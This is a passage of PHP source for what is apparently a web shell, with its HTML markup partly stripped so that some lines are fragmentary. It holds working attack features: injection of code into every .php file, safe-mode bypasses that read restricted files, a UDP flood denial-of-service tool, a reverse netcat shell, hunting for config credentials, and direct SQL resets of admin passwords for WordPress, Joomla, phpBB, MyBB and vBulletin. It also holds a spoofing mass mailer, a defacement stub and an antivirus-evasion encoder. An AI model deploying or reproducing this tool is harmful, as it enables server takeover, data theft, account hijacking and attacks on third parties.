0; $ext = array(" bytes"," Kb"," Mb"," Gb"," Tb"); while ($arg >= pow(1024,$j)) ++$j; return round($arg / pow(1024,$j-1) * 100) / 100 . $ext[$j-1]; } else return "0 bytes"; } // echo get_size("test.zip"); 3.82 Kb function get_size($file) { return format_size(filesize($file)); } function check_limit($new_filesize=0) { global $fm_current_root; global $quota_mb; if($quota_mb){ $total = total_size($fm_current_root); if (floor(($total+$new_filesize)/(1024*1024)) > $quota_mb) return true; } return false; } function get_user($arg) { global $mat_passwd; $aux = "x:".trim($arg).":"; for($x=0;$x"; } function banner() { global $ip; echo "[ System : ".php_uname() . "]
"; echo "[ Server : " . $_SERVER['SERVER_SOFTWARE'] ."]
" ; // Check for safe mode if( ini_get('safe_mode') ){ echo ' [Safe mode = on] ' ; }else{ echo ' [Safe mode = off (unsafe)] '; } echo " [ User: " . get_current_user() ." ] "; echo " [Server: " . (isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:"") . "] "; echo " [Client: ". $ip ."]"; //print_r($_SERVER); //print_r($_SERVER); } function compressFolder($rootPath) { chdir($_SESSION['current_dir']); // $rootPath = realpath(); if($rootPath[strlen($rootPath)-1] === '/' or $rootPath[strlen($rootPath)-1] === '\\') $rootPath = substr($rootPath,0,strlen($rootPath)-1); //echo $rootPath; // Initialize archive object $zip = new ZipArchive(); $zip->open($rootPath.".zip", ZipArchive::CREATE | ZipArchive::OVERWRITE); // Create recursive directory iterator /** @var SplFileInfo[] $files */ $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator( $rootPath), RecursiveIteratorIterator::LEAVES_ONLY ); foreach ($files as $name => $file) { // Skip directories (they would be added automatically) if (!$file->isDir()) { // Get real and relative path for current file $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($rootPath) + 1); // Add current file to archive //$zip->addFile($filePath, $relativePath); $zip->addFile($filePath, $name); } } // Zip archive will be created only after closing object $zip->close(); return $rootPath.".zip"; } function compressFileFolder($files) { chdir($_SESSION['current_dir']); // = array('New folder (3)', '404 shell.php', 'asim.html'); $zipname = 'downloadCompressed.zip'; $zip = new ZipArchive; $zip->open($zipname, ZipArchive::CREATE | ZipArchive::OVERWRITE); foreach ($files as $file) { if(!is_dir($file)) { $zip->addFile($file); } else { $rootPath=$file; $FolderFiles = new RecursiveIteratorIterator( new RecursiveDirectoryIterator( $rootPath), RecursiveIteratorIterator::LEAVES_ONLY ); foreach ($FolderFiles as $name => $FolderFile) { // Skip directories (they would be added automatically) if (!$FolderFile->isDir()) { // Get real and relative path for current file $filePath = $FolderFile->getRealPath(); //$relativePath = substr($filePath, strlen($rootPath) + 1); // Add current file to archive //$zip->addFile($filePath, $relativePath); $zip->addFile($filePath, $rootPath.'\\'.$name); } } } } $zip->close(); return $zipname; } function displayChangePassword() { global $rpath; ?>
Old Username:
Old Password:
New Username:
New Password:
Username and Password Changed Successfully"; } else echo "
Wrong Username:Password
"; } function displayHeaders() { echo "
"; foreach (getallheaders() as $name => $value) { echo "$name: $value
"; } echo "
"; } function findConfig() { global $rpath; chdir($_SESSION['current_dir']); $filenames = array("config.php","conf_global.php","Settings.php", "configuration.php","settings.php","configure.php" ); // Create recursive directory iterator /** @var SplFileInfo[] $files */ $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator( getcwd()), RecursiveIteratorIterator::LEAVES_ONLY ); foreach ($files as $name => $file) { $filePath = $file->getRealPath(); foreach ($filenames as $filename) { if (!$file->isDir() and strpos($name,$filename)!==false) { echo "".$filePath . "
"; } } } echo "
----------------------More Config Found-------------------
"; foreach ($files as $name => $file) { $filePath = $file->getRealPath(); if (!$file->isDir() and strpos($name,"config")!==false) { echo "".$filePath . "
"; } } } function displayCommands() { global $rpath,$islinux; ?>
	
"; } function displayHash() { global $rpath,$hpass,$hsalt; if(!isset($hpass)) { $hpass="admin"; } ?>
Password: Salt:
"; echo "Password : ".$hpass."
"; echo "MD5 : " . md5($hpass) . "
"; $wp_hasher = new PasswordHash(8, TRUE); echo "Wordpress : " . $wp_hasher->HashPassword('123') . "
"; echo "
"; } class PasswordHash { var $itoa64; var $iteration_count_log2; var $portable_hashes; var $random_state; function __construct($iteration_count_log2, $portable_hashes) { $this->itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'; if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31) $iteration_count_log2 = 8; $this->iteration_count_log2 = $iteration_count_log2; $this->portable_hashes = $portable_hashes; $this->random_state = microtime() . uniqid(rand(), TRUE); // removed getmypid() for compatibility reasons } function get_random_bytes($count) { $output = ''; if ( @is_readable('/dev/urandom') && ($fh = @fopen('/dev/urandom', 'rb'))) { $output = fread($fh, $count); fclose($fh); } if (strlen($output) < $count) { $output = ''; for ($i = 0; $i < $count; $i += 16) { $this->random_state = md5(microtime() . $this->random_state); $output .= pack('H*', md5($this->random_state)); } $output = substr($output, 0, $count); } return $output; } function encode64($input, $count) { $output = ''; $i = 0; do { $value = ord($input[$i++]); $output .= $this->itoa64[$value & 0x3f]; if ($i < $count) $value |= ord($input[$i]) << 8; $output .= $this->itoa64[($value >> 6) & 0x3f]; if ($i++ >= $count) break; if ($i < $count) $value |= ord($input[$i]) << 16; $output .= $this->itoa64[($value >> 12) & 0x3f]; if ($i++ >= $count) break; $output .= $this->itoa64[($value >> 18) & 0x3f]; } while ($i < $count); return $output; } function gensalt_private($input) { $output = '$P$'; $output .= $this->itoa64[min($this->iteration_count_log2 + ((PHP_VERSION >= '5') ? 5 : 3), 30)]; $output .= $this->encode64($input, 6); return $output; } function crypt_private($password, $setting) { $output = '*0'; if (substr($setting, 0, 2) == $output) $output = '*1'; $id = substr($setting, 0, 3); # We use "$P$", phpBB3 uses "$H$" for the same thing if ($id != '$P$' && $id != '$H$') return $output; $count_log2 = strpos($this->itoa64, $setting[3]); if ($count_log2 < 7 || $count_log2 > 30) return $output; $count = 1 << $count_log2; $salt = substr($setting, 4, 8); if (strlen($salt) != 8) return $output; # We're kind of forced to use MD5 here since it's the only # cryptographic primitive available in all versions of PHP # currently in use. To implement our own low-level crypto # in PHP would result in much worse performance and # consequently in lower iteration counts and hashes that are # quicker to crack (by non-PHP code). if (PHP_VERSION >= '5') { $hash = md5($salt . $password, TRUE); do { $hash = md5($hash . $password, TRUE); } while (--$count); } else { $hash = pack('H*', md5($salt . $password)); do { $hash = pack('H*', md5($hash . $password)); } while (--$count); } $output = substr($setting, 0, 12); $output .= $this->encode64($hash, 16); return $output; } function gensalt_extended($input) { $count_log2 = min($this->iteration_count_log2 + 8, 24); # This should be odd to not reveal weak DES keys, and the # maximum valid value is (2**24 - 1) which is odd anyway. $count = (1 << $count_log2) - 1; $output = '_'; $output .= $this->itoa64[$count & 0x3f]; $output .= $this->itoa64[($count >> 6) & 0x3f]; $output .= $this->itoa64[($count >> 12) & 0x3f]; $output .= $this->itoa64[($count >> 18) & 0x3f]; $output .= $this->encode64($input, 3); return $output; } function gensalt_blowfish($input) { # This one needs to use a different order of characters and a # different encoding scheme from the one in encode64() above. # We care because the last character in our encoded string will # only represent 2 bits. While two known implementations of # bcrypt will happily accept and correct a salt string which # has the 4 unused bits set to non-zero, we do not want to take # chances and we also do not want to waste an additional byte # of entropy. $itoa64 = './ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; $output = '$2a$'; $output .= chr(ord('0') + $this->iteration_count_log2 / 10); $output .= chr(ord('0') + $this->iteration_count_log2 % 10); $output .= '$'; $i = 0; do { $c1 = ord($input[$i++]); $output .= $itoa64[$c1 >> 2]; $c1 = ($c1 & 0x03) << 4; if ($i >= 16) { $output .= $itoa64[$c1]; break; } $c2 = ord($input[$i++]); $c1 |= $c2 >> 4; $output .= $itoa64[$c1]; $c1 = ($c2 & 0x0f) << 2; $c2 = ord($input[$i++]); $c1 |= $c2 >> 6; $output .= $itoa64[$c1]; $output .= $itoa64[$c2 & 0x3f]; } while (1); return $output; } function HashPassword($password) { if ( strlen( $password ) > 4096 ) { return '*'; } $random = ''; if (CRYPT_BLOWFISH == 1 && !$this->portable_hashes) { $random = $this->get_random_bytes(16); $hash = crypt($password, $this->gensalt_blowfish($random)); if (strlen($hash) == 60) return $hash; } if (CRYPT_EXT_DES == 1 && !$this->portable_hashes) { if (strlen($random) < 3) $random = $this->get_random_bytes(3); $hash = crypt($password, $this->gensalt_extended($random)); if (strlen($hash) == 20) return $hash; } if (strlen($random) < 6) $random = $this->get_random_bytes(6); $hash = $this->crypt_private($password, $this->gensalt_private($random)); if (strlen($hash) == 34) return $hash; # Returning '*' on error is safe here, but would _not_ be safe # in a crypt(3)-like function used _both_ for generating new # hashes and for validating passwords against existing hashes. return '*'; } function CheckPassword($password, $stored_hash) { if ( strlen( $password ) > 4096 ) { return false; } $hash = $this->crypt_private($password, $stored_hash); if ($hash[0] == '*') $hash = crypt($password, $stored_hash); return $hash === $stored_hash; } } class SimpleMail { protected $_wrap = 78; protected $_to = array(); protected $_subject; protected $_message; protected $_headers = array(); protected $_params; protected $_attachments = array(); protected $_uid; public function __construct() { $this->reset(); } public function reset() { $this->_to = array(); $this->_headers = array(); $this->_subject = null; $this->_message = null; $this->_wrap = 78; $this->_params = null; $this->_attachments = array(); $this->_uid = $this->getUniqueId(); return $this; } public function setTo($email, $name) { $this->_to[] = $this->formatHeader((string) $email, (string) $name); return $this; } public function getTo() { return $this->_to; } public function setSubject($subject) { $this->_subject = $this->encodeUtf8( $this->filterOther((string) $subject) ); return $this; } public function getSubject() { return $this->_subject; } public function setMessage($message) { $this->_message = str_replace("\n.", "\n..", (string) $message); return $this; } public function getMessage() { return $this->_message; } public function addAttachment($path, $filename = null) { $filename = empty($filename) ? basename($path) : $filename; $this->_attachments[] = array( 'path' => $path, 'file' => $filename, 'data' => $this->getAttachmentData($path) ); return $this; } public function getAttachmentData($path) { $filesize = filesize($path); $handle = fopen($path, "r"); $attachment = fread($handle, $filesize); fclose($handle); return chunk_split(base64_encode($attachment)); } public function setFrom($email, $name) { $this->addMailHeader('From', (string) $email, (string) $name); return $this; } public function addMailHeader($header, $email = null, $name = null) { $address = $this->formatHeader((string) $email, (string) $name); $this->_headers[] = sprintf('%s: %s', (string) $header, $address); return $this; } public function addGenericHeader($header, $value) { $this->_headers[] = sprintf( '%s: %s', (string) $header, (string) $value ); return $this; } public function getHeaders() { return $this->_headers; } public function setParameters($additionalParameters) { $this->_params = (string) $additionalParameters; return $this; } public function getParameters() { return $this->_params; } public function setWrap($wrap = 78) { $wrap = (int) $wrap; if ($wrap < 1) { $wrap = 78; } $this->_wrap = $wrap; return $this; } public function getWrap() { return $this->_wrap; } public function hasAttachments() { return !empty($this->_attachments); } public function assembleAttachmentHeaders() { $head = array(); $head[] = "MIME-Version: 1.0"; $head[] = "Content-Type: multipart/mixed; boundary=\"{$this->_uid}\""; return join(PHP_EOL, $head); } public function assembleAttachmentBody() { $body = array(); $body[] = "This is a multi-part message in MIME format."; $body[] = "--{$this->_uid}"; $body[] = "Content-type:text/html; charset=\"utf-8\""; $body[] = "Content-Transfer-Encoding: 7bit"; $body[] = ""; $body[] = $this->_message; $body[] = ""; $body[] = "--{$this->_uid}"; foreach ($this->_attachments as $attachment) { $body[] = $this->getAttachmentMimeTemplate($attachment); } return implode(PHP_EOL, $body); } public function getAttachmentMimeTemplate($attachment) { $file = $attachment['file']; $data = $attachment['data']; $head = array(); $head[] = "Content-Type: application/octet-stream; name=\"{$file}\""; $head[] = "Content-Transfer-Encoding: base64"; $head[] = "Content-Disposition: attachment; filename=\"{$file}\""; $head[] = ""; $head[] = $data; $head[] = ""; $head[] = "--{$this->_uid}"; return implode(PHP_EOL, $head); } public function send() { $to = $this->getToForSend(); $headers = $this->getHeadersForSend(); if (empty($to)) { throw new RuntimeException( 'Unable to send, no To address has been set.' ); } if ($this->hasAttachments()) { $message = $this->assembleAttachmentBody(); $headers .= PHP_EOL . $this->assembleAttachmentHeaders(); } else { $message = $this->getWrapMessage(); } return mail($to, $this->_subject, $message, $headers, $this->_params); } public function debug() { return '
' . print_r($this, true) . '
'; } public function __toString() { return print_r($this, true); } public function formatHeader($email, $name = null) { $email = $this->filterEmail($email); if (empty($name)) { return $email; } $name = $this->encodeUtf8($this->filterName($name)); return sprintf('"%s" <%s>', $name, $email); } public function encodeUtf8($value) { $value = trim($value); if (preg_match('/(\s)/', $value)) { return $this->encodeUtf8Words($value); } return $this->encodeUtf8Word($value); } public function encodeUtf8Word($value) { return sprintf('=?UTF-8?B?%s?=', base64_encode($value)); } public function encodeUtf8Words($value) { $words = explode(' ', $value); $encoded = array(); foreach ($words as $word) { $encoded[] = $this->encodeUtf8Word($word); } return join($this->encodeUtf8Word(' '), $encoded); } public function filterEmail($email) { $rule = array( "\r" => '', "\n" => '', "\t" => '', '"' => '', ',' => '', '<' => '', '>' => '' ); $email = strtr($email, $rule); $email = filter_var($email, FILTER_SANITIZE_EMAIL); return $email; } public function filterName($name) { $rule = array( "\r" => '', "\n" => '', "\t" => '', '"' => "'", '<' => '[', '>' => ']', ); $filtered = filter_var( $name, FILTER_SANITIZE_STRING, FILTER_FLAG_NO_ENCODE_QUOTES ); return trim(strtr($filtered, $rule)); } public function filterOther($data) { return filter_var($data, FILTER_UNSAFE_RAW, FILTER_FLAG_STRIP_LOW); } public function getHeadersForSend() { if (empty($this->_headers)) { return ''; } return join(PHP_EOL, $this->_headers); } public function getToForSend() { if (empty($this->_to)) { return ''; } return join(', ', $this->_to); } public function getUniqueId() { return md5(uniqid(time())); } public function getWrapMessage() { return wordwrap($this->_message, $this->_wrap); } } function processPaste() { global $islinux; if( isset($_SESSION['lastAction']) and $_SESSION['lastAction']=='Copy') { foreach ($_SESSION['Copy'] as $item) { if($islinux) { total_copy($_SESSION['CopyPath'] . "/" . $item ,$_SESSION['current_dir'] . "/" . $item); } else total_copy($_SESSION['CopyPath'] . "\\" . $item ,$_SESSION['current_dir'] . "\\" . $item); } $_SESSION['lastAction']=""; } else if( isset($_SESSION['lastAction']) and $_SESSION['lastAction']=='Cut') { foreach ($_SESSION['Cut'] as $item) { if($islinux) { total_copy($_SESSION['CutPath'] . "/" . $item ,$_SESSION['current_dir'] . "/" . $item); total_delete($_SESSION['CutPath'] . "/" . $item); } else { total_copy($_SESSION['CutPath'] . "\\" . $item ,$_SESSION['current_dir'] . "\\" . $item); total_delete($_SESSION['CutPath'] . "\\" . $item); } } $_SESSION['lastAction']=""; } } function processDelete() { global $islinux; foreach ($_POST['fileItem'] as $item){ if($islinux) { total_delete($_SESSION['current_dir'] . "/" . $item); } else total_delete($_SESSION['current_dir'] . "\\" . $item); } } function sendEmails() { global $to,$from,$replyto,$cc,$subject,$message,$attachment; $mail = new SimpleMail(); $tos = explode(",",$to); foreach ($tos as $i) { $mail->setTo($i, ''); } $mail->setSubject($subject); $mail->setFrom($from, ''); $mail->addMailHeader('Reply-To', $replyto, ''); $ccs = explode(",",$cc); foreach ($ccs as $a) { $mail->addMailHeader('Cc', $a, ''); } //$mail->addMailHeader('Bcc', 'steve@example.com', 'Steve Jobs'); $mail->addGenericHeader('X-PHP-Script', ''); $mail->addGenericHeader('X-Mailer', 'PHP/' . phpversion()); $mail->addGenericHeader('Content-Type', 'text/html; charset="utf-8"'); $mail->setMessage($message); if($attachment!="") { $ats = explode(",",$attachment); foreach ($ats as $a) { // echo "inside attachment
"; $mail->addAttachment($a); } } $mail->setWrap(100); $oldphpself = $_SERVER['PHP_SELF']; $oldremoteaddr = $_SERVER['REMOTE_ADDR']; $_SERVER['PHP_SELF']=""; $_SERVER['REMOTE_ADDR'] = $_SERVER['SERVER_ADDR']; $send = $mail->send(); $_SERVER['PHP_SELF']=$oldphpself; $_SERVER['REMOTE_ADDR']=$oldremoteaddr; echo ($send) ? 'Email sent successfully' : 'Could not send email'; return ""; } function displayMailer() { global $sendemail; ?>
To:
From:
Cc:
Bcc:
Reply-To:
Subject:
Message:
Attachment:
Notifier
Websites:
"; echo " Exploit-db
"; echo " Google
"; echo "
"; } function displayCodeInject() { global $codeInject; if(isset($codeInject)) { //var_dump($codeInject); if(isset($_SESSION['current_dir'])){ chdir($_SESSION['current_dir']); } $handle = opendir($_SESSION['current_dir']); while($aux = readdir($handle)) { if(!is_dir($aux) and strpos($aux,".php")!==false ) { file_put_contents($aux,"" . file_get_contents($aux)); } } @closedir($handle); } ?>
Inject PHP Code all .php files in current directory!

<?

?>

".htmlspecialchars(@fread($fh,filesize("test1.php")))."

"; @fclose($fh); unlink("test1.php"); } return true; } function bypassImap($file) { $stream = @imap_open($file, "", ""); $str = @imap_body($stream, 1); echo ""; return true; } function bypassSql($file) { /* else if(isset($_GET['sql'])) { echo ""; }*/ } function bypassCurl($file) { $ch=@curl_init("file://" . $file); @curl_setopt($ch,CURLOPT_HEADERS,0); @curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $file_out=@curl_exec($ch); @curl_close($ch); echo "

"; return true; } function bypassId($file) { echo ""; return true; } function bypassTmp($file) { $mytmp = tempnam ( 'tmp', $file ); $fp = fopen ( $mytmp, 'r' ); while(!feof($fp)) echo fgets($fp); fclose ( $fp ); return true; } function bypassSymlink($file) { echo ""; return true; } function bypassxxd($filename) { echo ""; return true; } function bypassrev($filename) { echo ""; return true; } function bypasstac($filename) { echo ""; return true; } function bypassmore($filename) { echo ""; return true; } function bypassless($filename) { echo ""; return true; } function displayBypassers() { global $tgtfile,$islinux,$tgt; ?>
http://ragde4.blogspot.com/2012/04/all-safemode-bypass-exploit.html
http://hackers2devnull.blogspot.com/2013/05/when-safe-mode-is-on-it-can-be-pain-to.html
http://xedlgubaid.blogspot.com/2012/05/how-to-bypass-safe-mode-on-in-server.html

File:

Bypass with Copy
Bypass with Imap
Bypass with Curl
Bypass with Id
Bypass with Tmpnam
Bypass with Symlink
Bypass with xxd
Bypass with rev
Bypass with tac
Bypass with more
Bypass with less
Bypassing " . $tgtfile . "
"; if($tgt==="Copy" and bypassCopy($tgtfile)===true) { echo "bypassed"; } //echo "Bypassing with Imap...
"; //if(@bypassImap($tgtfile)===true) //{ // echo "bypassed!"; //} //echo "Bypassing with Curl...
"; //try { // if(bypassCurl($tgtfile)===true) // { // echo "bypassed!"; // } //} //catch(Exception $e) //{ // echo $e->getMessage(); // } if($islinux) { if($tgt=="Id" and @bypassId($tgtfile)===true) { echo "bypassed!"; } } if($tgt=="Tmp" and bypassTmp($tgtfile)===true) { echo "bypassed!"; } if($tgt==="Symlink" and @bypassSymlink($tgtfile)===true) { echo "bypassed!"; } if($tgt==="xxd" and @bypassxxd($tgtfile)===true) { echo "bypassed!"; } if($tgt==="rev" and @bypassrev($tgtfile)===true) { echo "bypassed!"; } if($tgt==="tac" and @bypasstac($tgtfile)) { echo "bypassed!"; } if($tgt==="more" and @bypassmore($tgtfile)) { echo "bypassed!"; } if($tgt==="less" and @bypassless($tgtfile)) { echo "bypassed!"; } } } function displayDoS() { global $ip1,$exTime,$port,$timeout; ?>
Target IP :
Target Port:
Execution Time Seconds:
Time Out:
= $maxTime) { break; } } echo "
"; echo "Dos Completed!
"; echo "DOS attack against udp://$ip1:$port completed on ".date("h:i:s A")."
"; echo "Total Number of Packets Sent : " . $packets . "
"; echo "Total Data Sent = ". format_size($packets*$pktSize) . "
"; echo "Data per packet = " . format_size($pktSize) . "
"; echo "
"; } } function displayLogs() { ?>
Logs from server...!
Are you sure?
"; echo "
"; if(isset($KillMe)) total_delete( __FILE__); } function displayReverseNetcat() { global $ip,$port; ?>
IP : Port:

First Run #nc -lvp [port] , then run this script.
Target:
TCP
UDP
$currents, "; flush(); } } } echo "
"; } function displayForums() { global $faction; ?>
DB Host:
DB Name:
DB User:
DB Pass:
Forum:
User:
New Pass:
Table Prefix:




Password Changed Successfully"; } else echo "Cannot Change Password"; } if($forum === "joomla") { $con = mysql_connect($dbhost,$dbusername,$dbpassword); $db = mysql_select_db($dbname,$con); $newpassword = md5($newpassword); if($prefix == "" || $prefix == null) $sql = mysql_query("update josvk_users set password = '$newpassword' where username = '$username' "); else $sql = mysql_query("update ".$prefix."users set password = '$newpassword' where username = '$username' "); if($sql) { mysql_close($con); echo "Password Changed Successfully"; } else echo "Cannot Change Password"; } if($forum === "phpbb") { //echo "db host ".$dbhost."db name ".$dbname."db username ".$dbusername. // "db pass ".$dbpassword."forums ".$forum."db defacedata: ".$defacedata // ."new pass: ".$newpassword ."db username: ".$username; $con = mysql_connect($dbhost,$dbusername,$dbpassword); $db = mysql_select_db($dbname,$con); $newpassword = md5($newpassword); if($prefix == "" || $prefix == null) $sql = mysql_query("update phpbb_users set user_password = '$newpassword' where username = '$username' "); else $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where username = '$username' "); if($sql) { mysql_close($con); echo "Password Changed Successfully"; } else echo "Cannot Change Password"; } if($forum === "mybb") { $con = mysql_connect($dbhost,$dbusername,$dbpassword); $db = mysql_select_db($dbname,$con); $salt="00700700"; $newpassword = md5(md5($salt).md5($newpassword)); if($prefix == "" || $prefix == null) $sql = mysql_query("update mybb_users set password = '$newpassword',salt = '$salt' where username = '$username' "); else $sql = mysql_query("update ".$prefix."users set password = '$newpassword',salt = '$salt' where username = '$username' "); if($sql) { mysql_close($con); echo "Password Changed Successfully"; } else echo "Cannot Change Password"; } if($forum === "vb") { $con = mysql_connect($dbhost,$dbusername,$dbpassword); $db = mysql_select_db($dbname,$con); $salt="00700700"; $newpassword = md5(md5($newpassword) . $salt); if($prefix == "" || $prefix == null) $sql = mysql_query("update user set password = '$newpassword',salt = '$salt' where username = '$username' "); else $sql = mysql_query("update ".$prefix."users set password = '$newpassword',salt = '$salt' where username = '$username' "); if($sql) { mysql_close($con); echo "Password Changed Successfully"; } else echo "Cannot Change Password"; } } function defaceForums() { global $dbhost,$dbname,$dbusername,$dbpassword,$forum,$defacedata,$newusername,$newpassword; //echo $dbhost.$dbname.$dbusername.$dbpassword.$forums.$defacedata; echo "this is deface forum!"; } function displayEvadeAV() { global $file1,$file2; ?>
Input Filename: Output Filename:
\".\$tmp1.\""; file_put_contents($file2,$output); } } ?>